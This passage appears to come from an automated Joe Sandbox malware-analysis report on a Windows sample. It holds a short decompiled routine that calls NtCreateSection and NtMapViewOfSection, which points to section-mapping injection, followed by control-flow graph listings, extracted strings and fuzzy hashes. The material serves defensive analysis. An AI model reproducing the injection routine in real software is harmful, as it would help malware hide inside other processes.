                                                                                  				_t9 = __eax & 0xe3f7ebbe;
                                                                                  				_t22 = __eax & 0xe3f7ebbe;
                                                                                  				_push(0x5b);
                                                                                  				E004012BF(_t9, __edi, __esi, _t22);
                                                                                  				_t16 =  *((intOrPtr*)(_t21 + 8));
                                                                                  				Sleep(0x1388);
                                                                                  				_push(_t21 - 4);
                                                                                  				_push( *((intOrPtr*)(_t21 + 0x10)));
                                                                                  				_push( *((intOrPtr*)(_t21 + 0xc)));
                                                                                  				_push(_t16); // executed
                                                                                  				_t12 = E00401505(_t16, _t18, _t19, __esi, _t22); // executed
                                                                                  				if(_t12 != 0) {
                                                                                  					E004015D6(_t18, __fp0, _t16, _t12,  *((intOrPtr*)(_t21 - 4)),  *((intOrPtr*)(_t21 + 0x14))); // executed
                                                                                  				}
                                                                                  				 *_t16(0xffffffff, 0);
                                                                                  			}








                                                                                  0x004019b9
                                                                                  0x004019b9
                                                                                  0x004019b9
                                                                                  0x004019b4
                                                                                  0x004019be
                                                                                  0x004019c3
                                                                                  0x004019cb
                                                                                  0x004019d1
                                                                                  0x004019d2
                                                                                  0x004019d5
                                                                                  0x004019d8
                                                                                  0x004019d9
                                                                                  0x004019e0
                                                                                  0x004019ea
                                                                                  0x004019ea
                                                                                  0x004019f3

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019CB
                                                                                    • Part of subcall function 004015D6: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                    • Part of subcall function 004015D6: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                    • Part of subcall function 004015D6: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.1038324993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_14_2_400000_efbhiii.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                  • String ID:
                                                                                  • API String ID: 1885482327-0
                                                                                  • Opcode ID: 14c867bbebe5051f6db570b021724a6e87e9878d4436d251b998ffee1e39de59
                                                                                  • Instruction ID: f970500131d6f5d7b0cda6bb56c9dd11f6daaaa1a25153813255a2f113a46715
                                                                                  • Opcode Fuzzy Hash: 14c867bbebe5051f6db570b021724a6e87e9878d4436d251b998ffee1e39de59
                                                                                  • Instruction Fuzzy Hash: C7F05436304208F7DB016FD5DD51EAE3619AB44355F204177BA13B81F1D63C8511AB2B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 4756889-4756950 5 4756952-4756957 0->5 6 4756959-475697d 0->6 7 475697f-4756991 5->7 6->7 10 4756993-4756a08 7->10 11 4756a0d-4756a12 7->11 29 4756aa8-4756ab3 10->29 13 4756a14-4756a1c 11->13 14 4756a1e-4756a3e 11->14 16 4756a41-4756a56 13->16 14->16 21 4756a7f-4756aa2 16->21 22 4756a58-4756a7d 16->22 21->29 22->29 31 4756ab5-4756b11 29->31 32 4756b13-4756b59 call 47578a8 29->32 42 4756b68-4756ba1 31->42 41 4756b5f-4756b65 32->41 41->42 45 4756ba7-4756dd7 42->45 46 4756f0d-475713a 42->46 89 4756dd9-4756df9 45->89 90 4756dfb-4756e69 45->90 83 4757144-4757181 46->83 84 475713c-475713f 46->84 100 4757183-475719d 83->100 101 475719f-47571b1 83->101 86 4757432-4757434 84->86 87 4756543-4756580 86->87 88 475743a-475744b 86->88 92 47564cd-47564d0 87->92 88->92 93 4757451-4757454 88->93 94 4756e6f-4756e8a 89->94 90->94 97 47564d6 92->97 98 4757470-4757480 92->98 93->92 107 4756e96-4756f08 94->107 97->98 102 47574a0-47574ac 98->102 103 4757482-475749e 98->103 105 47571bb-4757242 100->105 101->105 106 47574b6-47574e2 102->106 103->106 115 4757244-4757277 105->115 116 4757279-47572de 105->116 106->92 107->86 119 47572e2-4757366 115->119 116->119 128 475739d-47573e3 119->128 129 4757368-475739b 119->129 130 47573e7-475742c 128->130 129->130 130->86
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1478773900
                                                                                  • Opcode ID: 78531e0a9ab405c8c84e3a88a6e04aa6461d15895a008f9c4d921eb46a32e001
                                                                                  • Instruction ID: 4b83606dfe01bfffb9713d9f93401924f5e4c3ed724c60a64c5c9941d93ada0e
                                                                                  • Opcode Fuzzy Hash: 78531e0a9ab405c8c84e3a88a6e04aa6461d15895a008f9c4d921eb46a32e001
                                                                                  • Instruction Fuzzy Hash: 1462F874A00619CFDB15EF68D8597D9B7B2FF89300F10829AD449AB355EB30AE85CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187657178.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4990000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: *g<.$;@-F$ig"[$n(
                                                                                  • API String ID: 0-3841892304
                                                                                  • Opcode ID: 31f0ddbf9e4b7643c53dd829b7cd741b40c39ce130999dbd674293ff43bb0156
                                                                                  • Instruction ID: 55baf3b3f7111c6d1f750f7eaeb82f9da91cab33012167739f873aca1af58575
                                                                                  • Opcode Fuzzy Hash: 31f0ddbf9e4b7643c53dd829b7cd741b40c39ce130999dbd674293ff43bb0156
                                                                                  • Instruction Fuzzy Hash: 2A322E74B10204DFC758EB68D5A1AAE73F6FF8D214B61416AD406DB3D9DB30AD82CB60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4d8a07ab352af178d642cb3ff3a7574564f3b23faefba7ef63f5f30985ea7aa3
                                                                                  • Instruction ID: 76450e4891b756f90a2783df1118a2456e167630df3fdf7403a458595e8a18fc
                                                                                  • Opcode Fuzzy Hash: 4d8a07ab352af178d642cb3ff3a7574564f3b23faefba7ef63f5f30985ea7aa3
                                                                                  • Instruction Fuzzy Hash: 42C17F71E105298BDB15CFA8C9806ADFBF5FB48305B18866AD859E7302D738ED46CB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 14099fc4c5188348e847eccef13535c0f2c487fec9f405ffb4cb531f98f0caab
                                                                                  • Instruction ID: a507979acdd334dfed1e6acaf27047df19125ef377fd2c2e14c0624e4ded8242
                                                                                  • Opcode Fuzzy Hash: 14099fc4c5188348e847eccef13535c0f2c487fec9f405ffb4cb531f98f0caab
                                                                                  • Instruction Fuzzy Hash: B441E4B0B04254DFDB08EBA8D590AAD77F6FF4A304F458869D0069B3D6DB34A942CF61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 134 475684f-4756864 136 4756866-475688f 134->136 137 47568c3-47568cc 134->137 146 4756891 136->146 147 4756893-47568c1 136->147 138 4756927-4756935 137->138 139 47568ce-47568f3 137->139 141 4756937-4756950 138->141 139->138 150 47568f5-4756925 139->150 148 4756952-4756957 141->148 149 4756959-475697d 141->149 146->137 147->141 151 475697f-4756991 148->151 149->151 150->141 156 4756993-4756a08 151->156 157 4756a0d-4756a12 151->157 177 4756aa8-4756ab3 156->177 160 4756a14-4756a1c 157->160 161 4756a1e-4756a3e 157->161 164 4756a41-4756a56 160->164 161->164 169 4756a7f-4756aa2 164->169 170 4756a58-4756a7d 164->170 169->177 170->177 179 4756ab5-4756b11 177->179 180 4756b13-4756b59 call 47578a8 177->180 190 4756b68-4756ba1 179->190 189 4756b5f-4756b65 180->189 189->190 193 4756ba7-4756dd7 190->193 194 4756f0d-475713a 190->194 237 4756dd9-4756df9 193->237 238 4756dfb-4756e69 193->238 231 4757144-4757181 194->231 232 475713c-475713f 194->232 248 4757183-475719d 231->248 249 475719f-47571b1 231->249 234 4757432-4757434 232->234 235 4756543-4756580 234->235 236 475743a-475744b 234->236 240 47564cd-47564d0 235->240 236->240 241 4757451-4757454 236->241 242 4756e6f-4756e8a 237->242 238->242 245 47564d6 240->245 246 4757470-4757480 240->246 241->240 255 4756e96-4756f08 242->255 245->246 250 47574a0-47574ac 246->250 251 4757482-475749e 246->251 253 47571bb-4757242 248->253 249->253 254 47574b6-47574e2 250->254 251->254 263 4757244-4757277 253->263 264 4757279-47572de 253->264 254->240 255->234 267 47572e2-4757366 263->267 264->267 276 475739d-47573e3 267->276 277 4757368-475739b 267->277 278 47573e7-475742c 276->278 277->278 278->234
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1130664661
                                                                                  • Opcode ID: bde752c4e37061ca1a3f959d16cdb0170a8ff64cad9268231c5c792eb5cb9121
                                                                                  • Instruction ID: fd1b2785aa2953f14b8e720d38b66ad1041fcaeafe53d0e4e09a0d3fc919b1df
                                                                                  • Opcode Fuzzy Hash: bde752c4e37061ca1a3f959d16cdb0170a8ff64cad9268231c5c792eb5cb9121
                                                                                  • Instruction Fuzzy Hash: 8CE15074A00618CFCB15EF68D8596DAB7B2FF89301F1081EAD449AB355DB34AE85CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 282 472e156-472e194 285 472deb5-472deb8 282->285 286 472e19a-472e19c 282->286 288 472e09a-472e0e2 285->288 289 472debe 285->289 286->285 287 472e1a1-472e1a5 286->287 290 472e1ab 287->290 291 472deec-472df06 287->291 289->288 289->291 292 472df90-472dfca 289->292 293 472e024-472e05a 289->293 294 472df54-472df80 call 472d3b0 289->294 295 472dec5-472dee2 289->295 296 472dfd8-472dff2 289->296 356 472e128 call 472f5c8 290->356 357 472e128 call 472f5b8 290->357 309 472df09-472df0e 291->309 292->285 317 472dfd0-472dfd3 292->317 358 472e05c call 472fac8 293->358 359 472e05c call 472fab8 293->359 294->291 325 472df86-472df8b 294->325 295->309 322 472dee4-472e08a 295->322 360 472dff8 call 472e690 296->360 361 472dff8 call 472e680 296->361 315 472e0e7-472e0ec 309->315 312 472dffe-472e01f 312->287 317->285 327 472e090-472e095 322->327 328 472df25-472df44 322->328 325->285 327->285 328->288 339 472df4a-472df4f 328->339 330 472e062-472e1dc call 472d3b0 344 472e1de-472e23d 330->344 345 472e23f 330->345 331 472e12e-472e130 331->293 332 472e136-472e144 331->332 332->285 335 472e14a-472e14d 332->335 335->285 339->285 346 472e241-472e271 344->346 345->346 346->285 351 472e277 346->351 351->285 356->331 357->331 358->330 359->330 360->312 361->312
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2912582977
                                                                                  • Opcode ID: eeac390b086e6cdb060a2327f619095747671e0e189900816f27aa696540c34d
                                                                                  • Instruction ID: 1ead0d37044dfccdbe75b952cab3086e07642e18d4914462dd7d9f799aa5985b
                                                                                  • Opcode Fuzzy Hash: eeac390b086e6cdb060a2327f619095747671e0e189900816f27aa696540c34d
                                                                                  • Instruction Fuzzy Hash: 238192B5704110CBD759AB29E1657AB32B7EBCC350F24816AE506D7789CB38BC428BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 362 472dedc-472dedd 363 472dee2 362->363 364 472dee4-472e08a 363->364 365 472df09-472df0e 363->365 368 472e090-472e095 364->368 369 472df25-472df44 364->369 367 472e0e7-472e0ec 365->367 370 472deb5-472deb8 368->370 371 472e09a-472e0e2 369->371 386 472df4a-472df4f 369->386 370->371 372 472debe 370->372 372->371 374 472df90-472dfca 372->374 375 472e024-472e048 372->375 376 472df54-472df80 call 472d3b0 372->376 377 472dec5-472ded7 372->377 378 472dfd8-472dfe0 372->378 379 472deec-472def4 372->379 374->370 396 472dfd0-472dfd3 374->396 399 472e052-472e05a 375->399 376->379 400 472df86-472df8b 376->400 377->362 387 472dfea-472dff2 378->387 382 472defe-472df06 379->382 382->365 386->370 432 472dff8 call 472e690 387->432 433 472dff8 call 472e680 387->433 393 472dffe-472e1a5 393->379 405 472e1ab 393->405 396->370 434 472e05c call 472fac8 399->434 435 472e05c call 472fab8 399->435 400->370 403 472e062-472e1dc call 472d3b0 418 472e1de-472e23d 403->418 419 472e23f 403->419 413 472e11b-472e123 405->413 436 472e128 call 472f5c8 413->436 437 472e128 call 472f5b8 413->437 416 472e12e-472e130 416->375 420 472e136-472e144 416->420 422 472e241-472e271 418->422 419->422 420->370 421 472e14a-472e14d 420->421 421->370 422->370 427 472e277 422->427 427->370 432->393 433->393 434->403 435->403 436->416 437->416
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2912582977
                                                                                  • Opcode ID: cf70ba68bc52c9497b6010e48547170d73af1f3f7e4a5af633e78343c33a0fd5
                                                                                  • Instruction ID: b3ac91265c13dbf03bbda16bb06ecc9071f7276804817b61646a6783c7e24cf8
                                                                                  • Opcode Fuzzy Hash: cf70ba68bc52c9497b6010e48547170d73af1f3f7e4a5af633e78343c33a0fd5
                                                                                  • Instruction Fuzzy Hash: 0871A3B5704110CBD759AA29E1657AB33A7EBCC350F24816AE506D77C9CF38BC428BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 438 49c16e0-49c179d 440 49c1b6c-49c1b76 438->440 441 49c17a3-49c1a00 438->441 443 49c176d-49c1801 441->443 444 49c1a06-49c1a31 441->444 482 49c19d2-49c19ec call 49c1dc8 443->482 448 49c198b-49c19ad 444->448 449 49c1a37-49c1a3c 444->449 466 49c1a41-49c1a82 448->466 477 49c19b3-49c19c4 448->477 451 49c16fc-49c16ff 449->451 452 49c1708-49c1711 451->452 453 49c1701 451->453 461 49c1713-49c1730 452->461 453->443 453->452 456 49c175e-49c178f 453->456 457 49c1ada-49c1b18 453->457 458 49c17d7-49c17e3 453->458 459 49c17b0-49c17d2 453->459 460 49c1732-49c1751 453->460 453->461 462 49c182d-49c1868 453->462 463 49c1a08-49c1a11 453->463 464 49c1964-49c1966 453->464 465 49c1806-49c1822 453->465 453->466 491 49c1898-49c18b5 456->491 457->440 507 49c1b1a-49c1b65 457->507 459->451 499 49c18ba-49c1941 call 49c2e98 460->499 500 49c1757-49c175c 460->500 461->451 462->451 498 49c186e-49c1871 462->498 463->440 470 49c1a17-49c1a1d 463->470 464->465 468 49c196c-49c197d 464->468 465->451 488 49c1828 465->488 466->440 506 49c1a88-49c1ad3 466->506 468->451 476 49c1983-49c1986 468->476 479 49c1876-49c188a 470->479 480 49c1a23-49c1a28 470->480 476->451 477->451 487 49c19ca-49c19cd 477->487 479->451 486 49c1890-49c1893 479->486 480->451 504 49c19f2-49c19f7 482->504 486->451 486->491 487->451 487->482 488->451 491->460 498->451 525 49c1947-49c1957 499->525 500->451 506->457 507->440 525->451 526 49c195d-49c195f 525->526 526->451 526->464
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: '$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-3432953478
                                                                                  • Opcode ID: 04bdab2e9abf9484489bcaadea8e4d4305c1903f3a2b3c64e70d7367da53708d
                                                                                  • Instruction ID: 03f834f0dbdda86839081bfa1a6bc6a20fcc43d8add85ac59a4343f3a923fe61
                                                                                  • Opcode Fuzzy Hash: 04bdab2e9abf9484489bcaadea8e4d4305c1903f3a2b3c64e70d7367da53708d
                                                                                  • Instruction Fuzzy Hash: F7B1A178304200CFC309EB55D196B6B73B7EBC8344F24857AD5068B79ADB34BC828B96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 529 472e2a9-472e2aa 530 472e2b0 529->530 531 472e2ac-472e2ae 529->531 532 472e2b2 530->532 533 472e248-472e249 530->533 531->530 535 472e2b4-472e2b6 532->535 536 472e2b8-472e2e0 532->536 534 472e250-472e271 533->534 539 472e277 534->539 540 472deb5-472deb8 534->540 535->536 539->540 541 472e09a-472e0e2 540->541 542 472debe 540->542 542->541 544 472df90-472dfca 542->544 545 472e024-472e05a 542->545 546 472df54-472df80 call 472d3b0 542->546 547 472dec5-472dee2 542->547 548 472dfd8-472dff2 542->548 549 472deec-472df06 542->549 544->540 568 472dfd0-472dfd3 544->568 613 472e05c call 472fac8 545->613 614 472e05c call 472fab8 545->614 546->549 575 472df86-472df8b 546->575 561 472df09-472df0e 547->561 573 472dee4-472e08a 547->573 609 472dff8 call 472e690 548->609 610 472dff8 call 472e680 548->610 549->561 566 472e0e7-472e0ec 561->566 564 472dffe-472e1a5 564->549 582 472e1ab 564->582 568->540 577 472e090-472e095 573->577 578 472df25-472df44 573->578 575->540 577->540 578->541 589 472df4a-472df4f 578->589 580 472e062-472e1dc call 472d3b0 598 472e1de-472e23d 580->598 599 472e23f 580->599 611 472e128 call 472f5c8 582->611 612 472e128 call 472f5b8 582->612 589->540 596 472e12e-472e130 596->545 600 472e136-472e144 596->600 602 472e241-472e246 598->602 599->602 600->540 601 472e14a-472e14d 600->601 601->540 602->534 609->564 610->564 611->596 612->596 613->580 614->580
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1086257671
                                                                                  • Opcode ID: aeefb386d936ac0d0835e2b66e0f4ce2ef47546849e49a2c372e2acefe068bbe
                                                                                  • Instruction ID: 6724a3420bb90803ced2b1f80aed689776493b4cdc9b008075f80acff58f3a3b
                                                                                  • Opcode Fuzzy Hash: aeefb386d936ac0d0835e2b66e0f4ce2ef47546849e49a2c372e2acefe068bbe
                                                                                  • Instruction Fuzzy Hash: 7381C5B5704110CBD719EB28E1657AB33B7EBC8310F2481A6E506D7789DF38BC428BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 615 4755568-4755569 616 47555de-47555e3 615->616 617 475556b-4755572 615->617 694 47555e5 call 4755a50 616->694 695 47555e5 call 4755a40 616->695 618 4755574-4755576 617->618 619 4755578-475558a 617->619 618->619 688 475558d call 4755711 619->688 689 475558d call 4755568 619->689 620 47555eb-475561d 625 47555c2-47555c5 620->625 626 475561f-4755622 620->626 623 475558f-4755591 627 4755624-4755644 625->627 628 47555c7 625->628 626->625 650 47557c6-47557e6 627->650 651 475564a-47557b8 627->651 628->627 629 47558b5-4755944 628->629 630 4755951-475596e 628->630 631 475569d-47556c4 628->631 632 475590c-4755910 628->632 633 475564f-475568b call 4754db0 628->633 634 47555ce-47555dd 628->634 635 47558d9-4755907 call 4754db0 628->635 629->625 672 475594a-475594c 629->672 692 4755971 call 4759c70 630->692 693 4755971 call 4759c80 630->693 631->625 656 47556ca-47556cd 631->656 632->629 637 4755912 632->637 690 475568d call 4756460 633->690 691 475568d call 4756450 633->691 634->616 686 475582b call 47593f0 637->686 687 475582b call 47593e0 637->687 659 47557ba-47557c3 650->659 669 47557e8-47557ed 650->669 651->659 651->669 652 4755977 652->659 656->625 668 4755693-4755698 668->625 669->625 672->625 682 4755831-4755863 682->625 685 4755869 682->685 685->625 686->682 687->682 688->623 689->623 690->668 691->668 692->652 693->652 694->620 695->620
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1848528525
                                                                                  • Opcode ID: 35d9b430a226a4126c2f22e1ed938209cfbc5ab375730dcf35f9b1f417030631
                                                                                  • Instruction ID: f28388de62ca30a2d4512aa49cea1ce2a9a551da3a397b8b109d1b0168c5a793
                                                                                  • Opcode Fuzzy Hash: 35d9b430a226a4126c2f22e1ed938209cfbc5ab375730dcf35f9b1f417030631
                                                                                  • Instruction Fuzzy Hash: 4881B775704204DBD709EB59E455BAB73ABEBC8300F10C46AE946CB39DCB78BD418BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 696 472afe8-472b228 742 472b22a call 472b2a8 696->742 743 472b22a call 472b298 696->743 699 472b230-472b232 701 472b161-472b164 699->701 702 472b036-472b039 701->702 703 472b16a-472b16f 701->703 704 472b237-472b242 702->704 705 472b03f-472b054 702->705 706 472b000-472b003 703->706 705->706 708 472b056-472b059 705->708 706->701 707 472b009 706->707 707->701 710 472b010-472b1b6 707->710 711 472b0e1-472b151 707->711 712 472b0d7-472b0e0 707->712 713 472b05b-472b09e 707->713 708->706 744 472b1b9 call 472bc00 710->744 745 472b1b9 call 472bbf0 710->745 746 472b1b9 call 472bafd 710->746 747 472b1b9 call 472bb0d 710->747 711->706 734 472b157-472b15c 711->734 724 472b0a0-472b0a6 713->724 725 472b0b6-472b0bd 713->725 727 472b0aa-472b0ac 724->727 728 472b0a8 724->728 727->725 728->725 729 472b1bf-472b204 736 472b20a 729->736 737 472b0be-472b0ca 729->737 734->706 736->713 740 472b185-472b196 736->740 737->706 738 472b0d0-472b0d2 737->738 738->706 740->706 741 472b19c 740->741 741->706 742->699 743->699 744->729 745->729 746->729 747->729
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2493264460
                                                                                  • Opcode ID: 30970cccea3396b86e201f842919c666caf5edab03ff1d1bbd7737d395c0d394
                                                                                  • Instruction ID: 311866fbe64fbc2be6be505157bedd898306b5bb081b43ffbcb6fcb643bcb33a
                                                                                  • Opcode Fuzzy Hash: 30970cccea3396b86e201f842919c666caf5edab03ff1d1bbd7737d395c0d394
                                                                                  • Instruction Fuzzy Hash: 9051C374700218CFD715EF65E655BAB73B6EB88310F10887AD1168B399DB30BC82CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 748 49c16b9-49c16ba 749 49c16bc-49c16bd 748->749 750 49c16c0-49c16c8 748->750 751 49c16bf 749->751 752 49c16d3-49c16da 749->752 846 49c16cb call 49c16b9 750->846 847 49c16cb call 49c16e0 750->847 751->750 754 49c16dc-49c16df 752->754 755 49c16e0-49c179d 752->755 753 49c16cd-49c16ce 754->755 757 49c1b6c-49c1b76 755->757 758 49c17a3-49c1a00 755->758 760 49c176d-49c1801 758->760 761 49c1a06-49c1a31 758->761 799 49c19d2-49c19ec call 49c1dc8 760->799 765 49c198b-49c19ad 761->765 766 49c1a37-49c1a3c 761->766 783 49c1a41-49c1a82 765->783 794 49c19b3-49c19c4 765->794 768 49c16fc-49c16ff 766->768 769 49c1708-49c1711 768->769 770 49c1701 768->770 778 49c1713-49c1730 769->778 770->760 770->769 773 49c175e-49c178f 770->773 774 49c1ada-49c1b18 770->774 775 49c17d7-49c17e3 770->775 776 49c17b0-49c17d2 770->776 777 49c1732-49c1751 770->777 770->778 779 49c182d-49c1868 770->779 780 49c1a08-49c1a11 770->780 781 49c1964-49c1966 770->781 782 49c1806-49c1822 770->782 770->783 808 49c1898-49c18b5 773->808 774->757 824 49c1b1a-49c1b65 774->824 776->768 816 49c18ba-49c1941 call 49c2e98 777->816 817 49c1757-49c175c 777->817 778->768 779->768 815 49c186e-49c1871 779->815 780->757 787 49c1a17-49c1a1d 780->787 781->782 785 49c196c-49c197d 781->785 782->768 805 49c1828 782->805 783->757 823 49c1a88-49c1ad3 783->823 785->768 793 49c1983-49c1986 785->793 796 49c1876-49c188a 787->796 797 49c1a23-49c1a28 787->797 793->768 794->768 804 49c19ca-49c19cd 794->804 796->768 803 49c1890-49c1893 796->803 797->768 821 49c19f2-49c19f7 799->821 803->768 803->808 804->768 804->799 805->768 808->777 815->768 842 49c1947-49c1957 816->842 817->768 823->774 824->757 842->768 843 49c195d-49c195f 842->843 843->768 843->781 846->753 847->753
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: '$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-3717930527
                                                                                  • Opcode ID: 437c2a648647fab53718d9bc1d570b6d6e0013aeddf7c20434545dbd766a756e
                                                                                  • Instruction ID: 05b008e081a0c46650b6828cfa3cd7107dd0b0940c7d6b32f9b7caa2b9d2a46d
                                                                                  • Opcode Fuzzy Hash: 437c2a648647fab53718d9bc1d570b6d6e0013aeddf7c20434545dbd766a756e
